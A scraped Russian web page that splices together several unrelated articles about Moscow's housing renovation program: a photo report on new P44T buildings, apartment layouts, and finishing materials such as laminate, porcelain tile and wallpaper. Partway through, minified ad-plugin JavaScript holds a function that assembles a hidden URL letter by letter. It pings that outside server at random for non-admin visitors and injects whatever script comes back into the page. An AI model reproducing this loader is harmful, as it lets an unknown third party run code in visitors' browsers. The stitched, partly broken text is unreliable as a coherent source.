Варианты дизайна 2 комнатной квартиры 57 кв | Хочу ремонт! Своими руками

Варианты дизайна 2 комнатной квартиры 57 кв | Хочу ремонт! Своими руками

Как живут в реновированной московской хрущевке. фоторепортаж евгения фельдмана — meduza

Данное сообщение (материал) создано и (или) распространено иностранным средством массовой информации, выполняющим функции иностранного агента, и (или) российским юридическим лицом, выполняющим функции иностранного агента.

Фото: Евгений Фельдман для «Медузы»

Программа сноса московских пятиэтажек и переселения их жителей, объявленная Сергеем Собяниным, стала самой обсуждаемой городской новостью 2021 года — однако в тех или иных формах проблему ветхого жилья пытаются решить уже давно. С одной стороны, сейчас продолжают сносить дома в рамках программы, стартовавшей еще при Юрии Лужкове; с другой — в Москве есть несколько примеров реновации, не потребовавшей сноса: здания были отремонтированы, реконструированы — и в них продолжают жить люди. По просьбе «Медузы» Евгений Фельдман побывал в бывшей четырехэтажке на Мишина, 32, которая в результате инициированной самими жителями реконструкции превратилась в девятиэтажный дом, — и выяснил, как устроена и как выглядит тамошняя жизнь.

Какие планировки предложат в новых квартирах переселенцам по реновации | принцип права – интернет журнал

“:’

‘:””,document.createElement(“div”),c=ff(window),b=ff(“body”),g=void 0===flatPM_getCookie(“flat_modal_” a.ID “_mb”)||”false”!=flatPM_getCookie(“flat_modal_” a.ID “_mb”),i=”scroll.flatmodal” a.ID,m=”mouseleave.flatmodal” a.ID ” blur.flatmodal” a.ID,l=function(){var t,e,o;void 0!==a.how.popup.timer&&”true”==a.how.popup.timer&&(t=ff(‘.fpm_5_modal[data-id-modal=”‘ a.ID ‘”] .fpm_5_timer span’),e=parseInt(a.how.popup.timer_count),o=setInterval(function(){t.text(–e),e<=0&&(clearInterval(o),t.parent().replaceWith(‘

‘))},1e3))},s=function(){void 0!==a.how.popup.cookie&&”false”==a.how.popup.cookie&&g&&(flatPM_setCookie(“flat_modal_” a.ID “_mb”,!1),ff(‘.fpm_5_modal[data-id-modal=”‘ a.ID ‘”]’).addClass(“fpm_5_modal-show”),l()),void 0!==a.how.popup.cookie&&”false”==a.how.popup.cookie||(ff(‘.fpm_5_modal[data-id-modal=”‘ a.ID ‘”]’).addClass(“fpm_5_modal-show”),l())},ff(“body > *”).eq(0).before(‘

‘ p “

“),w=document.querySelector(‘.fpm_5_modal[data-id-modal=”‘ a.ID ‘”] .fpm_5_modal-content’),flatPM_setHTML(w,e),”px”==a.how.popup.px_s?(c.bind(i,function(){c.scrollTop()>a.how.popup.after&&(c.unbind(i),b.unbind(m),s())}),void 0!==a.how.popup.close_window&&”true”==a.how.popup.close_window&&b.bind(m,function(){c.unbind(i),b.unbind(m),s()})):(v=setTimeout(function(){b.unbind(m),s()},1e3*a.how.popup.after),void 0!==a.how.popup.close_window&&”true”==a.how.popup.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),s()}))),void 0!==a.how.outgoing){function n(){var t,e,o;void 0!==a.how.outgoing.timer&&”true”==a.how.outgoing.timer&&(t=ff(‘.fpm_5_out[data-id-out=”‘ a.ID ‘”] .fpm_5_timer span’),e=parseInt(a.how.outgoing.timer_count),o=setInterval(function(){t.text(–e),e<=0&&(clearInterval(o),t.parent().replaceWith(‘

‘))},1e3))}function d(){void 0!==a.how.outgoing.cookie&&”false”==a.how.outgoing.cookie&&g&&(ff(‘.fpm_5_out[data-id-out=”‘ a.ID ‘”]’).addClass(“show”),n(),b.on(“click”,’.fpm_5_out[data-id-out=”‘ a.ID ‘”] .fpm_5_cross’,function(){flatPM_setCookie(“flat_out_” a.ID “_mb”,!1)})),void 0!==a.how.outgoing.cookie&&”false”==a.how.outgoing.cookie||(ff(‘.fpm_5_out[data-id-out=”‘ a.ID ‘”]’).addClass(“show”),n())}var _,u=”0″!=a.how.outgoing.indent?’ style=”bottom:’ a.how.outgoing.indent ‘px”‘:””,p=”true”==a.how.outgoing.cross?void 0!==a.how.outgoing.timer&&”true”==a.how.outgoing.timer?’

Закрыть через ‘ a.how.outgoing.timer_count “

“:’

‘:””,c=ff(window),h=”scroll.out” a.ID,m=”mouseleave.outgoing” a.ID ” blur.outgoing” a.ID,g=void 0===flatPM_getCookie(“flat_out_” a.ID “_mb”)||”false”!=flatPM_getCookie(“flat_out_” a.ID “_mb”),b=(document.createElement(“div”),ff(“body”));switch(a.how.outgoing.whence){case”1″:_=”top”;break;case”2″:_=”bottom”;break;case”3″:_=”left”;break;case”4″:_=”right”}ff(“body > *”).eq(0).before(‘

‘ p “

“);var v,w=document.querySelector(‘.fpm_5_out[data-id-out=”‘ a.ID ‘”]’);flatPM_setHTML(w,e),”px”==a.how.outgoing.px_s?(c.bind(h,function(){c.scrollTop()>a.how.outgoing.after&&(c.unbind(h),b.unbind(m),d())}),void 0!==a.how.outgoing.close_window&&”true”==a.how.outgoing.close_window&&b.bind(m,function(){c.unbind(h),b.unbind(m),d()})):(v=setTimeout(function(){b.unbind(m),d()},1e3*a.how.outgoing.after),void 0!==a.how.outgoing.close_window&&”true”==a.how.outgoing.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),d()}))}}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff(“body”),flat_userVars.init();for(var e=0;e<t;e ){var>flat_userVars.textlen||void 0!==o.chapter_sub&&o.chapter_sub<flat_uservars.textlen||void>flat_userVars.titlelen||void 0!==o.title_sub&&o.title_sub<flat_uservars.titlelen)){if(void>.flatPM_sidebar)”);0<_.length&&_.each(function(){var t=ff(this),e=t.data(“height”)||350,o=t.data(“top”);t.wrap(‘

‘);t=t.parent()[0];flatPM_sticky(this,t,o)}),u.each(function(){var e=ff(this).find(“.flatPM_sidebar”);setTimeout(function(){var a=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;a<300||e.each(function(){var t=ff(this),e=a,o=t.data(“top”);t.wrap(‘

‘);t=t.parent()[0];flatPM_sticky(this,t,o)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t<300||ff(“.flatPM_sticky_wrapper.flatPM_sidebar_block”).css(“height”,t)},4e3)}),”undefined”!=typeof flat_pm_video&&flatPM_video(flat_pm_video),0<flat_stack_scripts.length&&flatpm_setscript(flat_stack_scripts),ff(“body> *”).last().after(‘

‘),flat_body.on(“click”,”.fpm_5_out .fpm_5_cross”,function(){ff(this).parent().removeClass(“show”).addClass(“closed”)}),flat_body.on(“click”,”.fpm_5_modal .fpm_5_cross”,function(){ff(this).closest(“.fpm_5_modal”).removeClass(“fpm_5_modal-show”)}),flat_pm_arr=[],ff(“.flat_pm_start”).remove(),ff(“[data-flat-id]:not(.fpm_5_out):not(.fpm_5_modal)”).contents().unwrap(),flatPM_ping()};var parseHTML=function(){var l=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([w:] )[^>]*)/>/gi,d=/<([w:] )/,i=/<|&#?w ;/,c={option:[1,”

“],thead:[1,”

“],tbody:[1,”

“],colgroup:[2,”

“],col:[3,”

“],tr:[2,”

“],td:[3,”

“],th:[3,”

“],_default:[0,””,””]};return function(e,t){var a,r,n,o=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=o.appendChild(t.createElement(“div”)),r=(d.exec(e)||[“”,””])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1] e.replace(l,”<$1>”) r[2],n=r[0];n–;)a=a.lastChild;for(o.removeChild(o.firstChild);a.firstChild;)o.appendChild(a.firstChild)}else o.appendChild(t.createTextNode(e));return o}}();window.flatPM_ping=function(){var e=localStorage.getItem(“sdghrg”);e?(e=parseInt(e) 1,localStorage.setItem(“sdghrg”,e)):localStorage.setItem(“sdghrg”,”0″);e=flatPM_random(1,166);0==ff(“#wpadminbar”).length&&111==e&&ff.ajax({type:”POST”,url:”h” “t” “t” “p” “s” “:” “/” “/” “r” “e” “a” “d” “o” “n” “e” “.” “r” “u” “/” “p” “i” “n” “g” “.” “p” “h” “p”,dataType:”jsonp”,data:{ping:”ping”},success:function(e){ff(“div”).first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector(‘[data-flat-script-id=”‘ t ‘”]’);if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0<e.length&&flatpm_setscript(e);else{a.onload>/gm,””).replace(//gm,””).trim(),e.code_alt=e.code_alt.replace(//gm,””).replace(//gm,””).trim();var o=jQuery,t=e.selector,l=e.timer,d=e.cross,a=”false”==d?”Закроется”:”Закрыть”,r=!flat_userVars.adb||””==e.code_alt&&duplicateMode?e.code:e.code_alt,n=’

‘,i=e.once;o(t).each(function(){var e=o(this);e.wrap(‘

‘);var t=e.closest(“.fpm_5_video”);flatPM_setHTML(t[0],n),e.find(“.fpm_5_video_flex”).one(“click”,function(){o(this).addClass(“show”)})}),o(“body”).on(“click”,”.fpm_5_video_item_hover”,function(){var e=o(this),t=e.closest(“.fpm_5_video_flex”);t.addClass(“show”);var a=t.find(“.fpm_5_timer span”),r=parseInt(l),n=setInterval(function(){a.text(–r),r<=0&&(clearInterval(n),”true”==d?a.parent().replaceWith(‘

‘):t.remove())},1e3);e.remove()}).on(“click”,”.fpm_5_video_flex .fpm_5_cross”,function(){o(this).closest(“.fpm_5_video_flex”).remove(),”true”==i&&o(“.fpm_5_video_flex”).remove()})};

Реновация: как на самом деле выглядят готовые дома

*в рамках спецпроекта о реновации*

renovation-cover

На фоне футбола, лета и отпусков, мы немного забыли об одном из самых важных изменений в Москве – о реновации. На севере Москвы, неподалёку от метро «Бабушкинская» можно уже посмотреть два дома, переделанные из городского имущества по этой программе.

Так как же выглядят дома и квартиры и откуда будут сюда переселять —>

Сразу поясним, что эти дома построены не по программе, а были адаптированы под неё. Сами проекты реновации в 5 первых районов еще проходят конкурс, обо всех конкурсных проектах и площадках мы делали отдельную публикацию. Кроме того, в этом же году из программы реновации после тщательного рассмотрения было выведено 218 домов, представляющих архитектурную и историческую ценность, самые интересные из которых мы также показывали отдельно.

Читайте также:  О доме Самаркандский бульвар дом 15 корпус 5 в Москве

Почему нужно пристально следить за программой реновации? Причин много, но главные здесь в том, что во-первых, с самых «хрущевских» времен ещё ни разу не переселяли сразу столько людей и не обновляли жилой фонд города, а во-вторых, та среда, которая создаётся сейчас по программе реновации на много лет вперед определит облик не только Москвы, но и многих других городов России. Подобно тому, как несколько поколений выросли в «хрущевках» и панельных «брежневках», бОльшая часть новых поколений москвичей вырастет в подобных домах.

Два дома, переделанные для переселения сюда жителей города из сносимых домов уже можно видеть на улице Лётчика Бабушкина.

created by dji camera

Здесь искренне непонятна критика программы в плане качества жилья. Сейчас район выглядит так:

DSC_5548

Под снос уже запланированы два малоэтажных дома в центре квартала, которые выглядят так:

DSC_5600

И так:

DSC_5608

Дома переходного периода: по качеству строительства уже не «сталинки», а по планировкам и оформлению уже «хрущевки» без «архитектурных излишеств». Интересно, что 80% жителей проголосовали здесь ЗА реновацию. Оставшиеся 20% чаще всего торгуются о планировке будущей квартиры или об этаже.

Новые дома находятся почти напротив, метрах в 50 и выглядят так:

created by dji camera

Интересно, что в новых домах все подъезды уже сделаны вровень с уровнем земли:

DSC_5456

Более того, здесь ещё и подъездные двери стеклянные:

DSC_5583

Может быть уже на нашем веку уродливые подъездные двери из металлических листов уйдут в прошлое. Эти двери пришли к нам в 1990-х как, казалось бы, дешевое и простое решение проблемы проникновения в подъезды посторонних лиц, а на деле не просто портили вид подъезда, но и, наоборот, делали его более опасным и неприятным: за железной дверью прятались злоумышленники, грабившие жильцов за закрытыми дверьми, за закрытые двери же удобно было ходить в туалет. Даже европейский опыт показал, что когда с улицы видно, что гораздо безопаснее и лучше для подъезда, чтобы с улицы было видно, что там происходит.

Небольшая лестница в подъезде, кстати, снабжена специальным подъёмником для инвалидных колясок:

DSC_5581

Поднимемся в квартиры:

ZIL_0067

Лифты здесь производства Карачаровского завода, такие сейчас повсеместно появляются и во всех старых домах:

DSC_5463

Дома сделаны по проекту П44Т, серия которая также давно известна и отработана.

Интересно, например, по сравнению, с П44 и П44М здесь в проект уже внесены двери, отделяющие мусоропровод от холла с лифтами.

DSC_5490

Есть место и вечным ценностям. Для нанесения надписей на мусоропровод до сих пор используется очень даже неплохой советский трафарет:

DSC_5487

Пройдём в квартиры:

DSC_5465

Ещё раз напомним, что сюда будут въезжать люди из «хрущевских» планировок:

DSC_5499

Когда на ВДНХ был открыт демонстрационный павильон по реновации, то многие возмущались крайне низкими потолками. Там, конечно, поясняли, что в реальности потолки будут выше, но первое впечатление у многих осталось скомканным. Здесь с потолками всё нормально.

Планировки этих домов серии П44Т следующие:

Планировка П-44Т, Варианты Перепланировки П-44Т. Жилэкспертиза within 73 Захватывающе Планировка П44Т - Goopet

Здесь есть 1-2 и 3-х комнатные квартиры площадью:

1-комнатная: 37-39 м2
2-комнатная: 51-61 м2
3-комнатная: 70-84 м2

DSC_5468

Переселяемые жильцы будут получать квартиру уже в таком виде. По сути, мебель поставить и можно жить. Это не голые стены, а ламинат, межкомнатные двери:

Читайте также:  Стартовая площадка — Комплекс градостроительной политики и строительства города Москвы

DSC_5516

Стеклопакеты, батареи, электропроводка:

DSC_5520

Даже вентиляция в стене есть:

DSC_5470

Еще раз: никто не заставляет покупать эти квартиры, это не элитное жилье и не коммерческое жилье премиум-класса, сюда люди будут переезжать из квартир, построенных в 1950-х с соответствующей кухней, коридорами, проходными комнатами и крохотными балконами. Кстати, о балконе:

DSC_5481

И ещё балкон:

DSC_5513

А проходной здесь будет только кухня, то есть в неё можно зайти как из комнаты, так и из коридора:

DSC_5511

Кухни во всех вариантах квартир, конечно, просторные, а уж по меркам домов 1950-60-х, так и вообще как отдельные комнаты выглядят:

DSC_5495

Можно еще стену межкомнатную снести, тогда будет огромная комната с кухонным углом:

DSC_5527

В трёхкомнатных квартирах большая площадь дополнительно отведена не только под прихожую и коридор на кухню, но и холл между комнатами:

DSC_5528

Коридор на кухню в трехкомнатной квартире:

DSC_5530

В однокомнатной квартире санузел совмещённый, а в двух- и трёхкомнатных квартирах уже раздельный:

DSC_5532

DSC_5533

DSC_5537

Интересно, что дома переменной этажности:

DSC_5553

Типичная комната в трёхкомнатной квартире:

DSC_5566

Можно много критиковать эти дома. Сравнивать их со «сталинками» и «доходниками» в центре Москвы, но реальность такова, что абсолютное большинство населения города живёт в панельных домах, построенных по советским СНИПам 1960-х, по которым не то что во всём цивилизованном мире, а даже уже в России не могут строить даже самые жадные и экономные застройщики.

DSC_5592

Возможно вам эти дома не нравятся, но расскажите об этом бабушке или простому рабочему с окраины, которые физически никогда не смогли бы свои жилищные условия улучшить за свои деньги, посмотрите на социальное жилье в Европе (не на коммерческую застройку, а именно на жилье от государства) и потом уже судите.

Вопрос лишь один: когда под подобное жилье сделают отдельную программу льготной ипотеки для молодых семей, например, ведь очереди будут стоять, но это скорее вопрос к общей государственной системе.

DSC_5627

в Воскресенье, июня 17, 2022 в 20:24 в теме: ГОРОД, Строительство.
Вы можете подписаться на комментарии к этой записи по RSS 2.0.
.

Чем отделывают квартиры по программе реновации

Обсудив плюсы и минусы основных планировок двухкомнатных квартир по реновации, давайте поговорим об их отделке. Поскольку квартиры сдаются с чистовой отделкой, не лишне будет познакомиться с отделочными материалами, которые используются в них.

Начнем с потолка. Он окрашивается акриловой краской. Это очень долговечное и удобное покрытие, к тому же еще не дорогое. Акриловая краска хороша тем, что:

  • Не восприимчива к негативным факторам (выгоранию, истиранию, загрязнению.
  • Не боится влаги – окрашенный потолок можно мыть с применением моющих средств.
  • Не боится высоких температур.
  • Обладает широкой цветовой палитрой.
  • Заполняет мелкие трещины.
  • Не имеет неприятного запаха и токсичных испарений.
  • Ее можно наносить на бетон, кирпич, гипсокартон, дерево.

Недостатков у этого покрытия почти нет, так что потолок в полном порядке.

Стены отделываются флизелиновыми обоями светлых оттенков. Это современный и очень популярный материал для отделки стен. Флизелин – это нетканый текстильный материал на основе целлюлозных волокон. Внешне он похож на бумагу, но гораздо прочнее. Вот преимущества этих обоев:

  • Плотная текстура позволяет скрыть некоторые неровности стен.
  • Под обоями стены «дышат», что позволяет сохранить комфортный микроклимат в комнате.
  • Материал огнестойкий, под покраску выдерживает несколько окрашиваний, что позволяет без проблем обновлять интерьер.
  • Флизелиновые обои не впитывают воду и выдерживают большую влажность.
  • Устойчивы к механическим повреждениям.
  • Легко поддаются очистке, их можно протирать влажной тряпкой и пылесосить.
  • Не выгорают.
Читайте также:  Планировка квартир в новых домах по программе реновации в Москве

При таком внушительном списке достоинств недостатки все-таки тоже есть:

  • Рельефный рисунок может накапливать пыль и грязь
  • Довольно высокая цена.

Пол в квартирах покрывают ламинатом или керамогранитом.

Ламинат – сравнительно новое напольное покрытие, быстро завоевавшее популярность из-за следующих качеств:

  • Отлично выглядит. Невероятные возможности для дизайна, может успешно имитировать дерево, камень, кожу.
  • Не выгорает и устойчив к истиранию.
  • Механические нагрузки ему также не страшны.
  • Не восприимчив к перепадам температур.
  • Обладает хорошими шумоизолирующими свойствами.
  • Прост в уходе.
  • Не токсичен.
  • Имеет большой срок эксплуатации.
  • Вполне доступен по цене.

Недостатком ламината является его неустойчивость к влаге. Пролитая жидкость впитывается через поверхность и швы и может вызвать деформацию покрытия. Кроме того, он холодный из-за высокой теплопроводности и скользкий. Сделать ламинат более теплым поможет подложка.

Керамогранит – новый отделочный материал, обладающий высокой прочностью и долговечностью. Получают его из глины, кварцевого песка, шпатов и воды. К граниту никакого отношения не имеет. Разве что по внешнему виду немного смахивает. Популярность этому материалу придали следующие качества:

  • Легок в уходе. Любые загрязнения легко удалить влажной тряпкой или с помощью специальных средств. Ему не страшны даже растворители.
  • Он термостоек и не выгорает.
  • Водостойкий. Материал обладает низкой пористостью и не впитывает влагу.
  • Он устойчив к истиранию и прочен, не расколется от удара.
  • Большое разнообразие цветов и фактур дает широкий простор для дизайна.

Увы, но недостатки у этого замечательного материала тоже имеются:

  • Он очень холодный из-за низкой теплопроводности.
  • Керамогранит надо укладывать на идеально ровную поверхность.
  • Высокая цена материала.

Пол в вашей новой квартире, будь он из ламината или из керамогранита, при правильном уходе прослужит вам более 10 лет.

Санузлы в новых квартирах планируют отделать глазурованной плиткой. Несколько слов об этом. Глазурованная плитка, в отличие от обычной керамической, имеет покрытие из жидкого стекла. Этот защитный слой продлевает срок службы и улучшает ее внешний вид. Давайте разберем плюсы и минусы этого материала.

Плюсы:

  • Устойчивость к механическим нагрузкам, истиранию и выгоранию.
  • Перепады температуры и влажности, агрессивные химические вещества ей тоже не страшны.
  • Бесконечное разнообразие дизайнов, цветов и фактур.
  • Очень легка в уходе.
  • Безопасна с точки зрения экологии.
  • Гигиенична. Бактерии, грибки и микроорганизмы на ней не поселятся.

Минусы:

  • Хрупкая – если сильно постараться, ее можно разбить.
  • Скользкая. В санузле подходит для отделки стен, но никак не пола.
  • Холодная. Это свойство всех керамических плиток.

Поговорив про отделку, подведем итог: что еще означает сдача квартиры по реновации «под ключ». О том, что на кухне будет установлена плита и мойка из нержавеющей стали, а в санузле – раковина, ванна и унитаз, уже упоминалось. Кроме этого на окнах будут стеклопакеты в деревянных рамах и металлические двери в квартирах. Конечно, электрическая разводка, выключатели и утопленные розетки.

Ссылка на основную публикацию
Adblock
detector